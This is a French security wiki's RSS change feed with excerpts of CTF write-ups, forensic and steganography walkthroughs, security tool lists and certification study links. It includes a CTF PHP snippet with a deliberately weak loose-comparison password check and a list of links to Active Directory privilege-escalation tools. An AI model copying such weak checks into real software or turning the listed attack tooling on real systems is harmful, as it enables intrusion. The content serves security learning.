        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public&amp;rev=1404156546&amp;do=diff</link>
        <description>Crypto

	*  Aussie Hackerz
	*  NDH2K14_Wargame_Public_crypto2
	*  NDH2K14_Wargame_Public_crypto3
	*  NDH2K14_Wargame_Public_crypto4

Stegano

	*  HZCoin
	*  NDH2K14_Wargame_Public_stegano2
	*  NDH2K14_Wargame_Public_stegano3
	*  NDH2K14_Wargame_Public_stegano4</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>ndh2k14_wargame_public_crypto1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto1&amp;rev=1491744837&amp;do=diff</link>
        <description>Le chalenge consistais à télécharger sur un lien &lt;http://static.wargame.ndh/AussieHackerz.txt&gt; un fichier contenant ce texte.

3035C994C99FC9943831327170373337C79DC99FC994C990703238C990343771313137C994323338C990383735C99FC79DC79D3833E280BE3431CA9E32C9A57075</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto2&amp;rev=1404989419&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-07-10T12:50:19+02:00</dc:date>
        <title>ndh2k14_wargame_public_crypto2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_crypto2&amp;rev=1404989419&amp;do=diff</link>
        <description>Challenge avec beaucoup de fichiers, mais le chiffré est l'image suivante : 



J'ai pas la table de déchiffrement ... Mais en gros l'idée c'est qu'on a un manuel de couture qui reprend chaque image (plus 3 ou 4 mais on peut simplement les ignorer puisqu'elles ne sont pas dans le chiffré). On remarque qu'il y a 16 icones de coutures utilisées dans le chiffré.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_forensic1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>ndh2k14_wargame_public_forensic1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_forensic1&amp;rev=1491744837&amp;do=diff</link>
        <description>Ici, le but est de trouvé combien de bitcoin nous nous sommes fait voler. On nous fournit un fichier, HoldUp.img, de 16Mo.

La commande file nous apprend qu'il s'agit d'une image de type ext3 : 



Il ne nous reste plus qu'à monter cette image avec la commande mount : mount -t ext3 Holdup.img ./MountFile</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_stegano1_hzcoin&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>ndh2k14_wargame_public_stegano1_hzcoin</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_stegano1_hzcoin&amp;rev=1491744837&amp;do=diff</link>
        <description>Dans cette épreuve une image au format .png nous est fournie. La voici : 



Avec hachoir-subfile.py nous nous rendons vite compte que cette image en contient deux : 



Intéressant. On va donc, toujours avec hachoir-subfile, récupérer ces deux images en rajoutant un chemin d'extraction en deuxième paramètre de cette commande : hachoir-subfile HZCoin.png ./</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_web1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>ndh2k14_wargame_public_web1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh2k14_wargame_public_web1&amp;rev=1491744837&amp;do=diff</link>
        <description>Je n'ai eut l'intelligence de prendre des screenshot donc, si quelqu'un en a pris...

Dans cette épreuve, nous avions un bête formulaire de login. Après quelques tentatives, nous pouvions tomber sur un message en anglais du type ”... utilisez votre tête”, head en anglais.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh_2015_quals&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>ndh_2015_quals</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh_2015_quals&amp;rev=1491744837&amp;do=diff</link>
        <description>NDH 2015 Quals
 # Title Category Points 1  faceBox  Web  100  2  faceSec  Web  100  3  Mickey  Web  1  4  SecureAuth  Exploit  350  5  Updator  Exploit  200  6  Cooper  Stegano  300  7  Superman  Crackme/Reverse  500  8  Mass Surveillance Software  Crackme/Reverse  300  9  Clark Kent  Crackme/Reverse  150  10  Crackme Prime  Crackme/Reverse  150  11  PDFCeption  Forensic  500  12  Bpythonastic  Forensic  300  13  Private  Forensic  100  14  WeshGrow  Crypto  300  15  Game Of Life  Crypto  150  1…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh_2016_quals&amp;rev=1459684150&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2016-04-03T13:49:10+02:00</dc:date>
        <title>ndh_2016_quals</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh_2016_quals&amp;rev=1459684150&amp;do=diff</link>
        <description>NDH 2016 Quals
 matriochka-step-1  Crackme  Catch me if you can  Stega  stegano-sound  Stega</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=ndh_2018_quals&amp;rev=1522589718&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-04-01T15:35:18+02:00</dc:date>
        <title>ndh_2018_quals</title>
        <link>http://wiki.zenk-security.com/doku.php?id=ndh_2018_quals&amp;rev=1522589718&amp;do=diff</link>
        <description>NDH 2018 Quals
 where-is-my-purse  Forensic</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nethunter_nexus_5&amp;rev=1587649426&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-04-23T15:43:46+02:00</dc:date>
        <title>nethunter_nexus_5</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nethunter_nexus_5&amp;rev=1587649426&amp;do=diff</link>
        <description>Installer Nethunter et Android 6 Marshmallow sur un Nexus 5.

But : Sortir de la poussière ce vieux téléphone et auditer des applications android

Prérequis

La version de base est android 4.4.2, numéro de build KOT49H (Mais cela n’empêchè pas d'avoir une autre version d'Android)</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=newbie_contest&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>newbie_contest</title>
        <link>http://wiki.zenk-security.com/doku.php?id=newbie_contest&amp;rev=1491744837&amp;do=diff</link>
        <description>Cette page a pour but de rassembler un maximum de challenges au sein de ce même site.

Il vous est demandé de respecter celle-ci, en effet chacun est apte à apporter une quelconque modification aux posts. (uniquement les membres)

Le principe de ce wiki est simple : Vous êtes libres si l'envie vous prend de réaliser un write up sur un challenge de Newbie Contest (quel qu'il soit). La communauté de Zenk-Security étant en partie basée sur le partage d'informations, ce wiki est là pour ça.…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nsa&amp;rev=1509845480&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T02:31:20+02:00</dc:date>
        <title>nsa</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nsa&amp;rev=1509845480&amp;do=diff</link>
        <description>La National Security Agency, ou plus exactement, la National Spying Agency est une agence du gouvernement américain qui collecte des données pour garder une trace de, eh bien, tout ce qu'il peut.
Si la NSA veut vous espionner et recueillir des renseignements sur vous, ils le feront.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013&amp;rev=1362241195&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-03-02T17:19:55+02:00</dc:date>
        <title>nullcon_battleunderground_2013</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013&amp;rev=1362241195&amp;do=diff</link>
        <description>Nullcon BattleUnderground est un CTF de type Jeopardy individuel.

Programming

	*  Question 1
	*  Question 2
	*  Question 3
	*  Question 4
	*  Question 5

Crypto

	*  Question 1
	*  Question 2
	*  Question 3
	*  Question 4
	*  Question 5

RE

	*  Question 1
	*  Question 2
	*  Question 3
	*  Question 4
	*  Question 5</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_exploitation_3&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>nullcon_battleunderground_2013_exploitation_3</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_exploitation_3&amp;rev=1491744837&amp;do=diff</link>
        <description>Lets do some PHP

&lt;http://nullcon-e1.no-ip.org/exp3/boo.php&gt;

À la fin de la page de présentation, un commentaire c'est glissé avec un lien vers la source de cette page.
&lt;http://nullcon-e1.no-ip.org/exp3/boo.html&gt;

&lt;?
  error_reporting(0);

   
  $pass = $_POST['password'];
  $key = &quot;key_goes_here&quot;;

  if(&quot;0&quot; == substr(md5($pass),0,10)) {
    echo &quot;Key: $key&quot;;
    exit(0);
  }
?&gt;

&lt;html&gt;
  &lt;body&gt;
    &lt;form method='post'&gt;
      Password: &lt;input type=&quot;password&quot; name=&quot;password&quot;&gt;&lt;/input&gt; &lt;br/&gt;
     …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_1&amp;rev=1362241599&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-03-02T17:26:39+02:00</dc:date>
        <title>nullcon_battleunderground_2013_misc_1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_1&amp;rev=1362241599&amp;do=diff</link>
        <description>Who wrote the private key on whiteboard just by looking at the public certificate?

&lt;https://plus.google.com/118187272963262049674/posts/TSDhe5CvaFe&gt;

During his own Google interview, Jeff Dean was asked the implications if P=NP were true.
He said, &quot;P = 0 or N = 1.&quot;
Then, before the interviewer had even finished laughing, Jeff examined Google’s public certificate and wrote the private key on the whiteboard.﻿</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_3&amp;rev=1362312965&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-03-03T13:16:05+02:00</dc:date>
        <title>nullcon_battleunderground_2013_misc_3</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_misc_3&amp;rev=1362312965&amp;do=diff</link>
        <description>Piece of cake.. really.

&lt;https://s3.amazonaws.com/Nullcon/2013/BU/Misc/m2.gz&gt;

Le fichier décompressé se nomme 1.bin.
Il s'agit d'une capture Wireshark.

On se retrouve avec des paquets RTP (G. 711).
Le protocole de signalisation est SIP, on peut penser à de la VoIP.
Wireshark nous permet de sauvegarder les streams directement.
Pour cela, sélectionné le premier paquet RTP (N°10):</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_re_2&amp;rev=1362241513&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-03-02T17:25:13+02:00</dc:date>
        <title>nullcon_battleunderground_2013_re_2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=nullcon_battleunderground_2013_re_2&amp;rev=1362241513&amp;do=diff</link>
        <description>Look deep.

Sample

Nous nous trouvons face à un exécutable Windows x86.

PROTECTiON iD nous donne la détection suivante:

Scanning -&gt; D:\nullcon\re\2\2.exe
File Type : 32-Bit Exe (Subsystem : Win GUI / 2), Size : 276897 (0439A1h) Byte(s)
[x] Warning - FileAlignment seems wrong.. is 0x00000200, calculated 0x00000400
-&gt; File has 417 (01A1h) bytes of appended data starting at offset 043800h
[File Heuristics] -&gt; Flag : 00000000000000001100001000100111 (0x0000C227)
[!] UPX 3.08 compressed !</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=olia_lialina&amp;rev=1607422243&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-12-08T11:10:43+02:00</dc:date>
        <title>olia_lialina</title>
        <link>http://wiki.zenk-security.com/doku.php?id=olia_lialina&amp;rev=1607422243&amp;do=diff</link>
        <description>Olia Lialina, née à Moscou le 4 mai 1971, est une artiste qui travaille avec le medium Internet.

[Olia Lialina avec un ami et partenaire, Dragan Espenschied]

Biographie

Olia Lialina est une pionnière du Net art. Elle a fait partie du groupe net.art aux côtés des artistes Heath Bunting, Vuk Cosic, Jodi et Alexei Shulgin jusqu'à la proclamation de la mort du groupe en 1998. Elle a étudié l'analyse cinématographique et le journalisme à l'université d'État de Moscou. Elle a fondé le site Art Tele…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=osce_ctp&amp;rev=1572249732&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-28T09:02:12+02:00</dc:date>
        <title>osce_ctp</title>
        <link>http://wiki.zenk-security.com/doku.php?id=osce_ctp&amp;rev=1572249732&amp;do=diff</link>
        <description>OSCE reviews 
&lt;https://www.offensive-security.com/testimonials-and-reviews/&gt;

OSCE Study Plan
&lt;https://www.abatchy.com/2017/03/osce-study-plan&gt;

OSCE study guide
&lt;https://aminbohio.com/study-guide-tips-offensive-security-certified-expert-osce-cracking-the-perimeter-ctp/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=oscp_pwk&amp;rev=1680099756&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2023-03-29T16:22:36+02:00</dc:date>
        <title>oscp_pwk</title>
        <link>http://wiki.zenk-security.com/doku.php?id=oscp_pwk&amp;rev=1680099756&amp;do=diff</link>
        <description>OSCP tools

SPARTA is a python GUI application which simplifies network infrastructure penetration testing by aiding the penetration tester in the scanning and enumeration phase. It allows the tester to save time by having point-and-click access to his toolkit and by displaying all tool output in a convenient way. If little time is spent setting up commands and tools, more time can be spent focusing on analysing results.
&lt;https://sparta.secforce.com/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=oscp_survival_guide&amp;rev=1738089746&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2025-01-28T19:42:26+02:00</dc:date>
        <title>oscp_survival_guide</title>
        <link>http://wiki.zenk-security.com/doku.php?id=oscp_survival_guide&amp;rev=1738089746&amp;do=diff</link>
        <description>----------

Note : Cette page est un copié/collé de cette ressource : &lt;https://pastebin.com/kEh1x20f&gt;
L'auteur original semble être Austin Scott et l'objectif de cette page est de sauvegarder ce document.

----------


Added on pastebin NOV 20TH, 2018

# OSCP-Survival-Guide
&lt;pre&gt;
   _____ _____ _____ ______   _____                  _            _   _____       _     _
  |  _  /  ___/  __ \| ___ \ /  ___|                (_)          | | |  __ \     (_)   | |
  | | | \ `--.| /  \/| |_/ / \ `--. _ …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=oswe_awae&amp;rev=1580550829&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2020-02-01T10:53:49+02:00</dc:date>
        <title>oswe_awae</title>
        <link>http://wiki.zenk-security.com/doku.php?id=oswe_awae&amp;rev=1580550829&amp;do=diff</link>
        <description>Le PAD pour améliorer cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

OSWE Certification Exam Guide
&lt;https://support.offensive-security.com/oswe-exam-guide/&gt;

Tips from offsec about OSWE :
&lt;https://twitter.com/offsectraining/status/1177221658622464000?s=19&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=oswp_wifu&amp;rev=1567346978&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-09-01T16:09:38+02:00</dc:date>
        <title>oswp_wifu</title>
        <link>http://wiki.zenk-security.com/doku.php?id=oswp_wifu&amp;rev=1567346978&amp;do=diff</link>
        <description>OSWP Reviews &lt;http://blackpentesters.blogspot.com/2014/04/offensive-security-wireless.html&gt;

OSWP Reviews &lt;http://www.primalsecurity.net/wifu-oswp-and-finding-evil-gcfa/&gt;

OSWP Reviews 
&lt;https://scriptdotsh.com/index.php/2018/04/30/my-experience-with-oswp-wifu-v3-2/&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_binaire&amp;rev=1557681930&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-05-12T19:25:30+02:00</dc:date>
        <title>outils_binaire</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_binaire&amp;rev=1557681930&amp;do=diff</link>
        <description>La plupart des outils listé sur cette page ont été conçu pour Windows.

Analyse / édition de fichiers statiques ou d'exécutables.

Interface graphique

 HxD

HxD peut ouvrir n'importe quel type de fichiers et éditer son contenu en base 16. HxD Hex Editor affiche trois colonnes : les offsets, le code hexadécimal et le code ASCII correspondant.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_d_analyses&amp;rev=1552295636&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-03-11T10:13:56+02:00</dc:date>
        <title>outils_d_analyses</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_d_analyses&amp;rev=1552295636&amp;do=diff</link>
        <description>Image

Copie du support

Analyse

	*  Framework
		*  The sleuthkit : &lt;http://www.sleuthkit.org/sleuthkit/&gt;


Carving

	*  &lt;http://www.cgsecurity.org/wiki/PhotoRec_FR&gt;
	*  &lt;https://github.com/sleuthkit/scalpel&gt;
	*  &lt;https://github.com/devttys0/binwalk&gt;
	*  &lt;https://sourceforge.net/projects/foremost/&gt;
	*  &lt;https://www.cgsecurity.org/wiki/TestDisk_Etape_par_Etape&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_forensic&amp;rev=1571073427&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-14T19:17:07+02:00</dc:date>
        <title>outils_forensic</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_forensic&amp;rev=1571073427&amp;do=diff</link>
        <description>Systemes d'exploitation

	*  bitscout - LiveCD/LiveUSB Analyse et acquisition distante
	*  Tsurugi - Distrib linux pour analyse forensique
	*  SANS Investigative Forensics Toolkit (sift) - La distrib SANS pour L'analyse forensique

Frameworks

	*  dff - Forensic framework
	*  dexter - Framework d'acquisition, extensible et sécurisé
	*  IntelMQ - IntelMQ Framwork de collecte et d'agrégation de flux TI/IOC pour la réponse a incident.
	*  Laika BOSS - IDS avec fonctionnalité de scan et analyse d'ob…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_malware&amp;rev=1571739412&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-22T12:16:52+02:00</dc:date>
        <title>outils_malware</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_malware&amp;rev=1571739412&amp;do=diff</link>
        <description>Par soucis de redondance au niveau des outils pouvant être utile ici, nous vous conseillons de jeter un œil également aux outils recommandés pour l'analyse de binaire.

Permet de surveiller et de monitorer l'environnement durant l'exécution d'un programme. Très utile dans le cas d'analyse de code malveillants.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_necessaires_a_l_analyse_des_malwares&amp;rev=1371204463&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-06-14T12:07:43+02:00</dc:date>
        <title>outils_necessaires_a_l_analyse_des_malwares</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_necessaires_a_l_analyse_des_malwares&amp;rev=1371204463&amp;do=diff</link>
        <description>Cette page contiendra les outils qui seront nécessaires à l'analyse des Malwares :

Process Explorer

Process Explorer donne une vue générale sur les processus, les dossiers, les fichiers et les clés de registres auquel accède une application donné .</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_reseau&amp;rev=1560496074&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-06-14T09:07:54+02:00</dc:date>
        <title>outils_reseau</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_reseau&amp;rev=1560496074&amp;do=diff</link>
        <description>FIXME Cette page est en court de rédaction, n'hésitez pas à y apporter votre contribution.

 Wireshark

Wireshark Un analyseur de paquets libre utilisé dans le dépannage et l'analyse de réseaux informatiques, le développement de protocoles, l'éducation et la rétro-ingénierie.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=outils_web&amp;rev=1571739513&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-22T12:18:33+02:00</dc:date>
        <title>outils_web</title>
        <link>http://wiki.zenk-security.com/doku.php?id=outils_web&amp;rev=1571739513&amp;do=diff</link>
        <description>Reconnaissance &amp; Mapping

webtech

	*  Identify technologies used on websites. 
	*  &lt;https://github.com/ShielderSec/webtech&gt;

Burp Suite

	*  Ses différents outils (proxy, spider, scanner, intruder, repeater, sequencer, etc.) fonctionnent parfaitement ensemble pour proposer un cadre de pentesting complet, du mapping initial en passant par l'analyse de la surface d'attaque, jusqu'aux découvertes et exploitation des vulnérabilités.</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=overthewire_narnia&amp;rev=1362161395&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2013-03-01T19:09:55+02:00</dc:date>
        <title>overthewire_narnia</title>
        <link>http://wiki.zenk-security.com/doku.php?id=overthewire_narnia&amp;rev=1362161395&amp;do=diff</link>
        <description>We all have to start somewhere.

Narnia is a wargame that has been rescued from the demise of intruded.net, previously hosted on narnia.intruded.net. Big thanks to adc, morla and reth for their help in resurrecting this game!

What follows below is the original description of narnia, copied from intruded.net:
Summary:
Difficulty:     2/10
Levels:	        10
Platform:	Linux/x86

Author:
nite

Special Thanks:
lx_jakal for pointing out a bug that made a level easier =)

Description:
This wargame is…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=perl&amp;rev=1572001067&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-10-25T12:57:47+02:00</dc:date>
        <title>perl</title>
        <link>http://wiki.zenk-security.com/doku.php?id=perl&amp;rev=1572001067&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 [Perl::Critic](&lt;http://search.cpan.org/~thaljef/Perl-Critic-1.126/lib/Perl/Critic.pm&gt;) - Critique Perl source code for best-practices.

🛠 [PerlTidy::snd] Program that acts as a [syntax checker] and tester/enforcer for coding practices in Perl. &lt;https://en.m.wikipedia.org/wiki/PerlTidy&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=php&amp;rev=1577801307&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2019-12-31T15:08:27+02:00</dc:date>
        <title>php</title>
        <link>http://wiki.zenk-security.com/doku.php?id=php&amp;rev=1577801307&amp;do=diff</link>
        <description>FIXME Le PAD pour proposer une amélioration à cette page : &lt;https://pad.zenk-security.com/p/merci&gt;

🛠 PHPStan v0.11.19 releases: PHP Static Analysis Tool &lt;https://securityonline.info/phpstan-php-static-analysis/&gt;

🛠 Cheatsheet for finding vulnerable PHP code using grep &lt;https://github.com/dustyfresh/PHP-vulnerability-audit-cheatsheet&gt;</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=privilege_escalation&amp;rev=1717495335&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2024-06-04T12:02:15+02:00</dc:date>
        <title>privilege_escalation</title>
        <link>http://wiki.zenk-security.com/doku.php?id=privilege_escalation&amp;rev=1717495335&amp;do=diff</link>
        <description>https://www.ns-echo.com/posts/cve_2023_33298.html  https://flast101.github.io/docker-privesc/
  https://github.com/stealthcopter/deepce  https://github.com/CravateRouge/bloodyAD
  https://github.com/antonioCoco/RemotePotato0
  https://research.ifcr.dk/certifried-active-directory-domain-privilege-escalation-cve-2022-26923-9e098fe298f4
  https://github.com/Dec0ne/KrbRelayUp
  https://github.com/GhostPack/Certify
  https://github.com/mandiant/ADFSDump
Windows Privilege Escalation Guide</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=projets_de_la_communaute&amp;rev=1352378182&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2012-11-08T13:36:22+02:00</dc:date>
        <title>projets_de_la_communaute</title>
        <link>http://wiki.zenk-security.com/doku.php?id=projets_de_la_communaute&amp;rev=1352378182&amp;do=diff</link>
        <description>Sur cette page sont répertoriés tout les projets qui sont prévus pour la communauté.
On retrouve des projets lancés par le staff, mais aussi des projets lancés par les utilisateurs.

Projets du staff

	*  Groupe de travail web-conférence - Un groupe de travail destiné à réfléchir sur la mise en place de web-conférence
	*  Bot IRC - Création d'un bot IRC pour afficher les nouveaux posts et autres actualités sur le channel principal
	*  Plateforme d'organisation collaborative des projets - Projet …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=proposition_d_audit&amp;rev=1389707007&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2014-01-14T14:43:27+02:00</dc:date>
        <title>proposition_d_audit</title>
        <link>http://wiki.zenk-security.com/doku.php?id=proposition_d_audit&amp;rev=1389707007&amp;do=diff</link>
        <description>*  Yunohost : soltuion d'autohébergement
	*  Nagios : solution de monitoring
	*  Zimbra : webmail
	*  Seeks : moteur de recherche décentralisé
	*  Plugins Wordpress
	*  OpenERP : ERP en python
	*  OfBiz : un ERP en Java
	*  Redmine : un bug tracker en rails
	*  Trac : un bug tracker en python
	*  Radiant : CMS en rails
	*  Owncloud : DropBox like “libre”</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=proprietaire&amp;rev=1509893138&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-05T15:45:38+02:00</dc:date>
        <title>proprietaire</title>
        <link>http://wiki.zenk-security.com/doku.php?id=proprietaire&amp;rev=1509893138&amp;do=diff</link>
        <description>Propriétaire (ou non-libre) est tout ce qui est sous une license restrictive. 

Ce terme est utilisé à la fois par ceux qui suivent l'EFF, et par les membres de la communauté Open Source, ce qui peut rendre le terme vague. 


Pour un terme plus précis, les deux champs de pensée utilisent leurs propres définitions concrètes. 

Les adeptes de la Free Software Foundation utilisent le terme Non-free, tandis que les membres de la communauté Open Source utilisent le terme Closed-Source. 

Non-free et …</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=proxmark3easy&amp;rev=1516580228&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2018-01-22T01:17:08+02:00</dc:date>
        <title>proxmark3easy</title>
        <link>http://wiki.zenk-security.com/doku.php?id=proxmark3easy&amp;rev=1516580228&amp;do=diff</link>
        <description>J'ai reçu comme cadeau de noël un proxmark 3 Easy de chez ELECHOUSE.
la version 'Easy' de proxmark est la moins chère de la gamme, c'est une version destinée au marché domestique chinois et coute environ 100$

L'ensemble du paquet mesure 82mm x 52mm, l'intérieur de la boite comporte une antenne LF 125 kHz, une antenne HF 13,56 MHz, un câble d'alimentation 'plat' avec revêtement siliconé, un ensemble de tags, un tournevis et les vises qui vont avec.
Le proxmark 3 Easy possède un bouton de fonctio…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=proxmark3v2&amp;rev=1670506114&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2022-12-08T14:28:34+02:00</dc:date>
        <title>proxmark3v2</title>
        <link>http://wiki.zenk-security.com/doku.php?id=proxmark3v2&amp;rev=1670506114&amp;do=diff</link>
        <description>&lt;https://github.com/Proxmark/proxmark3&gt;

Tutoriel de l'utilisation du Proxmark avec des Cartes Mifare

Mifare est une marque de carte NFC appartenant à NXP. Il existe différents modèles de carte Mifare, on peut notamment citer : 
–  Mifare Classic (avec 1 ou 4K de mémoire)
–  Mifare Ultralight
–  Mifare DESFireChaque type de carte ayant ses spécificités et ses variantes.
Pour ce document, je me suis concentré sur l’étude des Mifare Classic 1K qui est un des modèles les plus répandu.…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pulseaudio&amp;rev=1509829248&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-11-04T22:00:48+02:00</dc:date>
        <title>pulseaudio</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pulseaudio&amp;rev=1509829248&amp;do=diff</link>
        <description>PulseAudio est un système audio pour les systèmes d'exploitation POSIX, ce qui signifie qu'il est un proxy pour vos applications sonores. Il vous permet de faire des opérations avancées sur vos données sonores au passage entre votre application et votre matériel. Des choses comme le transfert de l'audio sur une autre machine, le changement du format de l'échantillon ou du nombre de canaux et le mélange de plusieurs sons en un seul sont facilement réalisés en utilisant un serveur de son. Il est l…</description>
    </item>
    <item rdf:about="http://wiki.zenk-security.com/doku.php?id=pwnium2k14_crypto1&amp;rev=1491744837&amp;do=diff">
        <dc:format>text/html</dc:format>
        <dc:date>2017-04-09T15:33:57+02:00</dc:date>
        <title>pwnium2k14_crypto1</title>
        <link>http://wiki.zenk-security.com/doku.php?id=pwnium2k14_crypto1&amp;rev=1491744837&amp;do=diff</link>
        <description>la chaîne à déchiffré est :

QlpoOTFBWSZTWTxSmOAAAAsJAF/gOwAgADEAAAiZMNT0JbKzhCQcyQtA2gNbvXgSvxdyRThQkDxSmOA=

en décodant en base 64 on observe l'entete “BZh91AY” qui est du BZ2

